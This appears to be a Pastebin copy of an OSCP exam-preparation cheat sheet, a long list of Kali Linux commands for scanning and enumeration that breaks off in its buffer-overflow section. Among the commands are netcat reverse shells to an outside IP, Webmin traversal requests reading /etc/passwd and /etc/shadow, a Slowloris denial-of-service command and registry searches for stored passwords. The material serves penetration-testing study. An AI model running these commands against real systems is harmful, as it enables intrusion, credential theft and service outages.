SHARE
TWEET

OSCP-Survival-Guide

a guest Nov 22nd, 2017 8,772 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # OSCP-Survival-Guide
  2. <pre>
  3.    _____ _____ _____ ______   _____                  _            _   _____       _     _      
  4.   |  _  /  ___/  __ \| ___ \ /  ___|                (_)          | | |  __ \     (_)   | |    
  5.   | | | \ `--.| /  \/| |_/ / \ `--. _   _ _ ____   _____   ____ _| | | |  \/_   _ _  __| | ___
  6.   | | | |`--. \ |    |  __/   `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
  7.   \ \_/ /\__/ / \__/\| |     /\__/ / |_| | |   \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| |  __/
  8.    \___/\____/ \____/\_|     \____/ \__,_|_|    \_/ |_| \_/ \__,_|_|  \____/\__,_|_|\__,_|\___|
  9. </pre>
  10. Kali Linux Offensive Security Certified Professional Playbook
  11.  
  12.  **NOTE: This document reffers to the target ip as the export variable $ip.**  
  13.  
  14.  **To set this value on the command line use the following syntax:**
  15.  
  16.  **export ip=192.168.1.100**
  17.  
  18.  
  19. ***UPDATE: October 2, 2017***
  20. Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed attempt. TRY HARDER!
  21.  
  22. https://www.youtube.com/watch?v=HBMZWl9zcsc
  23.  
  24. The good news is that I will be learning more and adding more content to this guide :D
  25.  
  26.  
  27. ## Table of Contents
  28. - [Kali Linux](#kali-linux)
  29. - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
  30.   * [Passive Information Gathering](#passive-information-gathering)
  31.   * [Active Information Gathering](#active-information-gathering)
  32.   * [Port Scanning](#port-scanning)
  33.   * [Enumeration](#enumeration)
  34.   * [HTTP Enumeration](#http-enumeration)
  35. - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
  36. - [Shells](#shells)
  37. - [File Transfers](#file-transfers)
  38. - [Privilege Escalation](#privilege-escalation)
  39.   * [Linux Privilege Escalation](#linux-privilege-escalation)
  40.   * [Windows Privilege Escalation](#windows-privilege-escalation)
  41. - [Client, Web and Password Attacks](#client-web-and-password-attacks)
  42.   * [Client Attacks](#client-attacks)
  43.   * [Web Attacks](#web-attacks)
  44.   * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
  45.   * [Database Vulnerabilities](#database-vulnerabilities)
  46.   * [Password Attacks](#password-attacks)
  47.   * [Password Hash Attacks](#password-hash-attacks)
  48. - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
  49. - [The Metasploit Framework](#the-metasploit-framework)
  50. - [Bypassing Antivirus Software](#bypassing-antivirus-software)
  51.  
  52. Kali Linux
  53. ========================================================================================================
  54.  
  55. -   Set the Target IP Address to the `$ip` system variable  
  56.     `export ip=192.168.1.100`
  57.  
  58. -   Find the location of a file  
  59.     `locate sbd.exe`
  60.  
  61. -   Search through directories in the `$PATH` environment variable  
  62.     `which sbd`
  63.  
  64. -   Find a search for a file that contains a specific string in it’s
  65.     name:  
  66.     `find / -name sbd\*`
  67.  
  68. -   Show active internet connections  
  69.     `netstat -lntp`
  70.  
  71. -   Change Password  
  72.     `passwd`
  73.  
  74. -   Verify a service is running and listening  
  75.     `netstat -antp |grep apache`
  76.  
  77. -   Start a service  
  78.     `systemctl start ssh  `
  79.    
  80.     `systemctl start apache2`
  81.  
  82. -   Have a service start at boot  
  83.     `systemctl enable ssh`
  84.  
  85. -   Stop a service  
  86.     `systemctl stop ssh`
  87.  
  88. -   Unzip a gz file  
  89.     `gunzip access.log.gz`
  90.  
  91. -   Unzip a tar.gz file  
  92.     `tar -xzvf file.tar.gz`
  93.  
  94. -   Search command history  
  95.     `history | grep phrase_to_search_for`
  96.  
  97. -   Download a webpage  
  98.     `wget http://www.cisco.com`
  99.  
  100. -   Open a webpage  
  101.     `curl http://www.cisco.com`
  102.  
  103. -   String manipulation
  104.  
  105.     -   Count number of lines in file  
  106.         `wc index.html`
  107.  
  108.     -   Get the start or end of a file  
  109.         `head index.html`
  110.        
  111.         `tail index.html`
  112.  
  113.     -   Extract all the lines that contain a string  
  114.         `grep "href=" index.html`
  115.  
  116.     -   Cut a string by a delimiter, filter results then sort  
  117.         `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
  118.  
  119.     -   Using Grep and regular expressions and output to a file  
  120.         `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
  121.  
  122.     -   Use a bash loop to find the IP address behind each host  
  123.         `for url in $(cat list.txt); do host $url; done`
  124.  
  125.     -   Collect all the IP Addresses from a log file and sort by
  126.         frequency  
  127.         `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
  128.  
  129. -   Decoding using Kali
  130.  
  131.     -   Decode Base64 Encoded Values
  132.        
  133.         `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
  134.  
  135.     -   Decode Hexidecimal Encoded Values  
  136.         `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`
  137.  
  138. -   Netcat - Read and write TCP and UDP Packets
  139.  
  140.     -   Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):
  141.         [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
  142.  
  143.     -   Connect to a POP3 mail server  
  144.         `nc -nv $ip 110`
  145.  
  146.     -   Listen on TCP/UDP port  
  147.         `nc -nlvp 4444`
  148.  
  149.     -   Connect to a netcat port  
  150.         `nc -nv $ip 4444`
  151.  
  152.     -   Send a file using netcat  
  153.         `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
  154.  
  155.     -   Receive a file using netcat  
  156.         `nc -nlvp 4444 > incoming.exe`
  157.        
  158.     -   Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
  159.          
  160.             whereis nc
  161.             nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
  162.  
  163.             /bin/nc.traditional -e /bin/bash 1.2.3.4 4444
  164.  
  165.  
  166.     -   Create a reverse shell with Ncat using cmd.exe on Windows  
  167.         `nc.exe -nlvp 4444 -e cmd.exe`
  168.        
  169.         or
  170.        
  171.         `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`
  172.  
  173.     -   Create a reverse shell with Ncat using bash on Linux  
  174.         `nc -nv $ip 4444 -e /bin/bash`
  175.        
  176.     -   Netcat for Banner Grabbing:
  177.    
  178.         `echo "" | nc -nv -w1 <IP Address> <Ports>`
  179.  
  180. -   Ncat - Netcat for Nmap project which provides more security avoid
  181.     IDS
  182.  
  183.     -   Reverse shell from windows using cmd.exe using ssl  
  184.         `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
  185.  
  186.     -   Listen on port 4444 using ssl  
  187.         `ncat -v $ip 4444 --ssl`
  188.  
  189. -   Wireshark
  190.     -   Show only SMTP (port 25) and ICMP traffic:
  191.    
  192.         `tcp.port eq 25 or icmp`
  193.        
  194.     -   Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
  195.        
  196.         `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
  197.        
  198.     -   Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
  199.        
  200.         `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
  201.        
  202.     -   Some commands are equal
  203.        
  204.         `ip.addr == xxx.xxx.xxx.xxx`
  205.        
  206.          Equals
  207.        
  208.         `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `
  209.  
  210.         ` ip.addr != xxx.xxx.xxx.xxx`
  211.        
  212.          Equals
  213.        
  214.         `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`
  215.  
  216. -   Tcpdump
  217.  
  218.     -   Display a pcap file  
  219.        `tcpdump -r passwordz.pcap`
  220.  
  221.     -   Display ips and filter and sort  
  222.         `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
  223.  
  224.     -   Grab a packet capture on port 80  
  225.         `tcpdump tcp port 80 -w output.pcap -i eth0`
  226.  
  227.     -   Check for ACK or PSH flag set in a TCP packet  
  228.         `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
  229.  
  230. -   IPTables
  231.  
  232.     -   Deny traffic to ports except for Local Loopback
  233.  
  234.         `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP  `
  235.    
  236.         `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
  237.  
  238.     -   Clear ALL IPTables firewall rules
  239.    
  240.             iptables -P INPUT ACCEPT
  241.             iptables -P FORWARD ACCEPT
  242.             iptables -P OUTPUT ACCEPT
  243.             iptables -t nat -F
  244.             iptables -t mangle -F
  245.             iptables -F
  246.             iptables -X
  247.             iptables -t raw -F iptables -t raw -X
  248.  
  249. Information Gathering & Vulnerability Scanning
  250. ===================================================================================================================================
  251.  
  252. -   Passive Information Gathering
  253.     ---------------------------------------------------------------------------------------------------------------------------
  254.  
  255. -   Google Hacking
  256.  
  257.     -   Google search to find website sub domains  
  258.         `site:microsoft.com`
  259.  
  260.     -   Google filetype, and intitle  
  261.         `intitle:"netbotz appliance" "OK" -filetype:pdf`
  262.  
  263.     -   Google inurl  
  264.         `inurl:"level/15/sexec/-/show"`
  265.  
  266.     -   Google Hacking Database:  
  267.         https://www.exploit-db.com/google-hacking-database/
  268.  
  269. -   SSL Certificate Testing  
  270.     [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
  271.  
  272. -   Email Harvesting
  273.  
  274.     -   Simply Email  
  275.         `git clone https://github.com/killswitch-GUI/SimplyEmail.git  `
  276.        
  277.         `./SimplyEmail.py -all -e TARGET-DOMAIN`
  278.  
  279. -   Netcraft
  280.  
  281.     -   Determine the operating system and tools used to build a site  
  282.         https://searchdns.netcraft.com/
  283.  
  284. -   Whois Enumeration  
  285.     `whois domain-name-here.com  `
  286.    
  287.     `whois $ip`
  288.  
  289. -   Banner Grabbing
  290.  
  291.     -   `nc -v $ip 25`
  292.  
  293.     -   `telnet $ip 25`
  294.  
  295.     -   `nc TARGET-IP 80`
  296.  
  297. -   Recon-ng - full-featured web reconnaissance framework written in Python
  298.  
  299.     -   `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git  `
  300.    
  301.         `cd /opt/recon-ng  `
  302.        
  303.         `./recon-ng  `
  304.        
  305.         `show modules  `
  306.        
  307.         `help`
  308.  
  309. -   Active Information Gathering
  310.     --------------------------------------------------------------------------------------------------------------------------
  311.  
  312. <!-- -->
  313.  
  314.  
  315. -   Port Scanning
  316.     -----------------------------------------------------------------------------------------------------------
  317. *Subnet Reference Table*
  318.  
  319. / | Addresses | Hosts | Netmask | Amount of a Class C
  320. --- | --- | --- | --- | ---
  321. /30 | 4 | 2 | 255.255.255.252| 1/64
  322. /29 | 8 | 6 | 255.255.255.248 | 1/32
  323. /28 | 16 | 14 | 255.255.255.240 | 1/16
  324. /27 | 32 | 30 | 255.255.255.224 | 1/8
  325. /26 | 64 | 62 | 255.255.255.192 | 1/4
  326. /25 | 128 | 126 | 255.255.255.128 | 1/2
  327. /24 | 256 | 254 | 255.255.255.0 | 1
  328. /23 | 512 | 510 | 255.255.254.0 | 2
  329. /22 | 1024 | 1022 | 255.255.252.0 | 4
  330. /21 | 2048 | 2046 | 255.255.248.0 | 8
  331. /20 | 4096 | 4094 | 255.255.240.0 | 16
  332. /19 | 8192 | 8190 | 255.255.224.0 | 32
  333. /18 | 16384 | 16382 | 255.255.192.0 | 64
  334. /17 | 32768 | 32766 | 255.255.128.0 | 128
  335. /16 | 65536 | 65534 | 255.255.0.0 | 256
  336.  
  337.  -   Set the ip address as a varble  
  338.      `export ip=192.168.1.100  `
  339.      `nmap -A -T4 -p- $ip`
  340.  
  341.  -   Netcat port Scanning  
  342.      `nc -nvv -w 1 -z $ip 3388-3390`
  343.      
  344.  -   Discover active IPs usign ARP on the network:
  345.      `arp-scan $ip/24`
  346.  
  347.  -   Discover who else is on the network  
  348.      `netdiscover`
  349.  
  350.  -   Discover IP Mac and Mac vendors from ARP  
  351.      `netdiscover -r $ip/24`
  352.  
  353.  -   Nmap stealth scan using SYN  
  354.      `nmap -sS $ip`
  355.  
  356.  -   Nmap stealth scan using FIN  
  357.      `nmap -sF $ip`
  358.  
  359.  -   Nmap Banner Grabbing  
  360.      `nmap -sV -sT $ip`
  361.  
  362.  -   Nmap OS Fingerprinting  
  363.      `nmap -O $ip`
  364.  
  365.  -   Nmap Regular Scan:  
  366.      `nmap $ip/24`
  367.  
  368.  -   Enumeration Scan  
  369.      `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
  370.  
  371.  -   Enumeration Scan All Ports TCP / UDP and output to a txt file  
  372.      `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
  373.  
  374.  -   Nmap output to a file:  
  375.      `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
  376.  
  377.  -   Quick Scan:  
  378.      `nmap -T4 -F $ip/24`
  379.  
  380.  -   Quick Scan Plus:  
  381.      `nmap -sV -T4 -O -F --version-light $ip/24`
  382.  
  383.  -   Quick traceroute  
  384.      `nmap -sn --traceroute $ip`
  385.  
  386.  -   All TCP and UDP Ports  
  387.      `nmap -v -sU -sS -p- -A -T4 $ip`
  388.  
  389.  -   Intense Scan:  
  390.      `nmap -T4 -A -v $ip`
  391.  
  392.  -   Intense Scan Plus UDP  
  393.      `nmap -sS -sU -T4 -A -v $ip/24`
  394.  
  395.  -   Intense Scan ALL TCP Ports  
  396.      `nmap -p 1-65535 -T4 -A -v $ip/24`
  397.  
  398.  -   Intense Scan - No Ping  
  399.      `nmap -T4 -A -v -Pn $ip/24`
  400.  
  401.  -   Ping scan  
  402.      `nmap -sn $ip/24`
  403.  
  404.  -   Slow Comprehensive Scan  
  405.      `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
  406.  
  407.  -   Scan with Active connect in order to weed out any spoofed ports designed to troll you  
  408.      `nmap -p1-65535 -A -T5 -sT $ip`
  409.  
  410. -   Enumeration
  411.     -----------
  412.  
  413. -   DNS Enumeration
  414.  
  415.     -   NMAP DNS Hostnames Lookup
  416.         `nmap -F --dns-server <dns server ip> <target ip range>`
  417.        
  418.     -   Host Lookup  
  419.         `host -t ns megacorpone.com`
  420.  
  421.     -   Reverse Lookup Brute Force - find domains in the same range  
  422.         `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
  423.  
  424.     -   Perform DNS IP Lookup  
  425.         `dig a domain-name-here.com @nameserver`
  426.  
  427.     -   Perform MX Record Lookup  
  428.         `dig mx domain-name-here.com @nameserver`
  429.  
  430.     -   Perform Zone Transfer with DIG  
  431.         `dig axfr domain-name-here.com @nameserver`
  432.  
  433.     -   DNS Zone Transfers  
  434.         Windows DNS zone transfer  
  435.        
  436.         `nslookup -> set type=any -> ls -d blah.com  `
  437.        
  438.         Linux DNS zone transfer  
  439.        
  440.         `dig axfr blah.com @ns1.blah.com`
  441.        
  442.     -   Dnsrecon DNS Brute Force  
  443.         `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
  444.  
  445.     -   Dnsrecon DNS List of megacorp  
  446.         `dnsrecon -d megacorpone.com -t axfr`
  447.  
  448.     -   DNSEnum  
  449.         `dnsenum zonetransfer.me`
  450.  
  451. -   NMap Enumeration Script List:
  452.  
  453.     -   NMap Discovery  
  454.         [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
  455.  
  456.     -   Nmap port version detection MAXIMUM power  
  457.         `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
  458.  
  459.  
  460. -   NFS (Network File System) Enumeration
  461.  
  462.     -   Show Mountable NFS Shares
  463.         `nmap -sV --script=nfs-showmount $ip`
  464.  
  465. -   RPC (Remote Procedure Call) Enumeration
  466.  
  467.     -   Connect to an RPC share without a username and password and enumerate privledges
  468.         `rpcclient --user="" --command=enumprivs -N $ip`
  469.  
  470.     -   Connect to an RPC share with a username and enumerate privledges
  471.         `rpcclient --user="<Username>" --command=enumprivs $ip`
  472.  
  473.  
  474. -   SMB Enumeration
  475.  
  476.     -   SMB OS Discovery  
  477.         `nmap $ip --script smb-os-discovery.nse`
  478.  
  479.     -   Nmap port scan  
  480.         `nmap -v -p 139,445 -oG smb.txt $ip-254`
  481.  
  482.     -   Netbios Information Scanning  
  483.         `nbtscan -r $ip/24`
  484.  
  485.     -   Nmap find exposed Netbios servers  
  486.         `nmap -sU --script nbstat.nse -p 137 $ip`
  487.        
  488.     -   Nmap all SMB scripts scan
  489.    
  490.         `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
  491.  
  492.     -   Nmap all SMB scripts authenticated scan
  493.    
  494.         `nmap -sV -Pn -vv -p 445  --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
  495.  
  496.     -   SMB Enumeration Tools  
  497.         `nmblookup -A $ip  `
  498.        
  499.         `smbclient //MOUNT/share -I $ip -N  `
  500.        
  501.         `rpcclient -U "" $ip  `
  502.        
  503.         `enum4linux $ip  `
  504.        
  505.         `enum4linux -a $ip`
  506.        
  507.  
  508.     -   SMB Finger Printing  
  509.         `smbclient -L //$ip`
  510.  
  511.     -   Nmap Scan for Open SMB Shares  
  512.         `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
  513.  
  514.     -   Nmap scans for vulnerable SMB Servers  
  515.         `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
  516.  
  517.     -   Nmap List all SMB scripts installed  
  518.         `ls -l /usr/share/nmap/scripts/smb*`
  519.  
  520.     -   Enumerate SMB Users
  521.    
  522.         `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
  523.        
  524.          OR        
  525.          
  526.          `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
  527.          
  528.  
  529.     -   RID Cycling - Null Sessions  
  530.         `ridenum.py $ip 500 50000 dict.txt`
  531.  
  532.     -   Manual Null Session Testing
  533.    
  534.         Windows: `net use \\$ip\IPC$ "" /u:""`
  535.        
  536.         Linux: `smbclient -L //$ip`
  537.        
  538.  
  539. -   SMTP Enumeration - Mail Severs
  540.  
  541.     -   Verify SMTP port using Netcat  
  542.         `nc -nv $ip 25`
  543.  
  544. -   POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
  545.  
  546.          root@kali:~# telnet $ip 110
  547.          +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
  548.          USER billydean    
  549.          +OK
  550.          PASS password
  551.          +OK Welcome billydean
  552.          
  553.          list
  554.          
  555.          +OK 2 1807
  556.          1 786
  557.          2 1021
  558.      
  559.          retr 1
  560.          
  561.          +OK Message follows
  562.          From: jamesbrown@motown.com
  563.          Dear Billy Dean,
  564.  
  565.          Here is your login for remote desktop ... try not to forget it this time!
  566.          username: billydean
  567.          password: PA$$W0RD!Z
  568.  
  569.  
  570. -   SNMP Enumeration -Simple Network Management Protocol
  571.  
  572.     -   Fix SNMP output values so they are human readable  
  573.         `apt-get install snmp-mibs-downloader download-mibs  `
  574.         `echo "" > /etc/snmp/snmp.conf`
  575.  
  576.     -   SNMP Enumeration Commands
  577.  
  578.         -   `snmpcheck -t $ip -c public`
  579.  
  580.         -   `snmpwalk -c public -v1 $ip 1|`
  581.  
  582.         -   `grep hrSWRunName|cut -d\* \* -f`
  583.  
  584.         -   `snmpenum -t $ip`
  585.  
  586.         -   `onesixtyone -c names -i hosts`
  587.  
  588.     -   SNMPv3 Enumeration  
  589.         `nmap -sV -p 161 --script=snmp-info $ip/24`
  590.  
  591.     -   Automate the username enumeration process for SNMPv3:  
  592.         `apt-get install snmp snmp-mibs-downloader  `
  593.         `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
  594.  
  595.     -   SNMP Default Credentials  
  596.         /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
  597.  
  598.  
  599. -   MS SQL Server Enumeration
  600.  
  601.     -   Nmap Information Gathering
  602.        
  603.         `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes  --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
  604.        
  605. -   Webmin and miniserv/0.01 Enumeration - Port 10000
  606.  
  607.       Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
  608.        
  609.         `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
  610.        
  611.       Test to see if webmin is running as root by grabbing /etc/shadow
  612.      
  613.         `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
  614.  
  615. -   Linux OS Enumeration
  616.  
  617.     -   List all SUID files  
  618.         `find / -perm -4000 2>/dev/null`
  619.  
  620.     -   Determine the current version of Linux  
  621.         `cat /etc/issue`
  622.  
  623.     -   Determine more information about the environment  
  624.         `uname -a`
  625.        
  626.     -   List processes running  
  627.         `ps -xaf`
  628.  
  629.     -   List the allowed (and forbidden) commands for the invoking use  
  630.         `sudo -l`
  631.  
  632.     -   List iptables rules  
  633.         `iptables --table nat --list  
  634.         iptables -vL -t filter  
  635.         iptables -vL -t nat  
  636.         iptables -vL -t mangle  
  637.         iptables -vL -t raw  
  638.         iptables -vL -t security`
  639.  
  640. -   Windows OS Enumeration
  641.  
  642.  
  643.     -   net config Workstation
  644.    
  645.     -   systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  646.    
  647.     -   hostname
  648.    
  649.     -   net users
  650.    
  651.     -   ipconfig /all
  652.    
  653.     -   route print
  654.    
  655.     -   arp -A
  656.    
  657.     -   netstat -ano
  658.    
  659.     -   netsh firewall show state  
  660.    
  661.     -   netsh firewall show config
  662.    
  663.     -   schtasks /query /fo LIST /v
  664.    
  665.     -   tasklist /SVC
  666.    
  667.     -   net start
  668.    
  669.     -   DRIVERQUERY
  670.    
  671.     -   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
  672.    
  673.     -   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
  674.    
  675.     -   dir /s *pass* == *cred* == *vnc* == *.config*
  676.    
  677.     -   findstr /si password *.xml *.ini *.txt
  678.    
  679.     -   reg query HKLM /f password /t REG_SZ /s
  680.    
  681.     -   reg query HKCU /f password /t REG_SZ /s
  682.  
  683. -   Vulnerability Scanning with Nmap
  684.  
  685. -   Nmap Exploit Scripts  
  686.     [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
  687.  
  688. -   Nmap search through vulnerability scripts  
  689.     `cd /usr/share/nmap/scripts/  
  690.     ls -l \*vuln\*`
  691.  
  692. -   Nmap search through Nmap Scripts for a specific keyword  
  693.     `ls /usr/share/nmap/scripts/\* | grep ftp`
  694.  
  695. -   Scan for vulnerable exploits with nmap  
  696.     `nmap --script exploit -Pn $ip`
  697.  
  698. -   NMap Auth Scripts  
  699.     [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
  700.  
  701. -   Nmap Vuln Scanning  
  702.     [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
  703.  
  704. -   NMap DOS Scanning  
  705.     `nmap --script dos -Pn $ip  
  706.     NMap Execute DOS Attack  
  707.     nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
  708.     http-slowloris.runforever=true`
  709.  
  710. -   Scan for coldfusion web vulnerabilities  
  711.     `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
  712.  
  713. -   Anonymous FTP dump with Nmap  
  714.     `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
  715.  
  716. -   SMB Security mode scan with Nmap  
  717.     `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
  718.  
  719. -   File Enumeration
  720.  
  721.     -   Find UID 0 files root execution
  722.  
  723.     -   `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
  724.  
  725.     -   Get handy linux file system enumeration script (/var/tmp)  
  726.         `wget https://highon.coffee/downloads/linux-local-enum.sh  `
  727.         `chmod +x ./linux-local-enum.sh  `
  728.         `./linux-local-enum.sh`
  729.  
  730.     -   Find executable files updated in August  
  731.         `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
  732.  
  733.     -   Find a specific file on linux  
  734.         `find /. -name suid\*`
  735.  
  736.     -   Find all the strings in a file  
  737.         `strings <filename>`
  738.  
  739.     -   Determine the type of a file  
  740.         `file <filename>`
  741.  
  742. -   HTTP Enumeration
  743.     ----------------
  744.  
  745.     -   Search for folders with gobuster:  
  746.         `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
  747.  
  748.     -   OWasp DirBuster - Http folder enumeration - can take a dictionary file
  749.  
  750.     -   Dirb - Directory brute force finding using a dictionary file  
  751.         `dirb http://$ip/ wordlist.dict  `
  752.         `dirb <http://vm/>  `
  753.          
  754.         Dirb against a proxy
  755.  
  756.     -   `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
  757.  
  758.     -   Nikto  
  759.         `nikto -h $ip`
  760.  
  761.     -   HTTP Enumeration with NMAP  
  762.         `nmap --script=http-enum -p80 -n $ip/24`
  763.  
  764.     -   Nmap Check the server methods  
  765.         `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
  766.  
  767.     -   Get Options available from web server
  768.          `curl -vX OPTIONS vm/test`
  769.  
  770.       -   Uniscan directory finder:  
  771.           `uniscan -qweds -u <http://vm/>`
  772.  
  773.       -   Wfuzz - The web brute forcer
  774.      
  775.           `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test  `
  776.          
  777.           `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ  `
  778.          
  779.           `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
  780.          
  781.           `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
  782.          
  783.           Recurse level 3
  784.          
  785.           `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
  786.  
  787. <!-- -->
  788.  
  789. -   Open a service using a port knock (Secured with Knockd)  
  790.     for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
  791.     --max-retries 0 -p $x server\_ip\_address; done
  792.  
  793. -   WordPress Scan - Wordpress security scanner
  794.  
  795.     -   wpscan --url $ip/blog --proxy $ip:3129
  796.  
  797. -   RSH Enumeration - Unencrypted file transfer system
  798.  
  799.     -   auxiliary/scanner/rservices/rsh\_login
  800.  
  801. -   Finger Enumeration
  802.  
  803.     -   finger @$ip
  804.  
  805.     -   finger batman@$ip
  806.  
  807. -   TLS & SSL Testing
  808.  
  809.     -   ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
  810.         OUTPUT-FILE.html
  811.  
  812. -   Proxy Enumeration (useful for open proxies)
  813.  
  814.     -   nikto -useproxy http://$ip:3128 -h $ip
  815.  
  816. -   Steganography
  817.  
  818. > apt-get install steghide
  819. >
  820. > steghide extract -sf picture.jpg
  821. >
  822. > steghide info picture.jpg
  823. >
  824. > apt-get install stegosuite
  825.  
  826. -   The OpenVAS Vulnerability Scanner
  827.  
  828.     -   apt-get update  
  829.         apt-get install openvas  
  830.         openvas-setup
  831.  
  832.     -   netstat -tulpn
  833.  
  834.     -   Login at:  
  835.         https://$ip:9392
  836.  
  837. Buffer Overflows and Exploits
  838. ===================================================================================================================================
  839.  
  840. -   DEP and ASLR - Data Execution Prevention (DEP) and Address Space
  841.     Layout Randomization (ASLR)
  842.  
  843.  
  844. -   Nmap Fuzzers:
  845.  
  846.     -   NMap Fuzzer List  
  847.         [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
  848.  
  849.     -   NMap HTTP Form Fuzzer  
  850.         nmap --script http-form-fuzzer --script-args
  851.         'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
  852.         -p 80 $ip
  853.  
  854.     -   Nmap DNS Fuzzer  
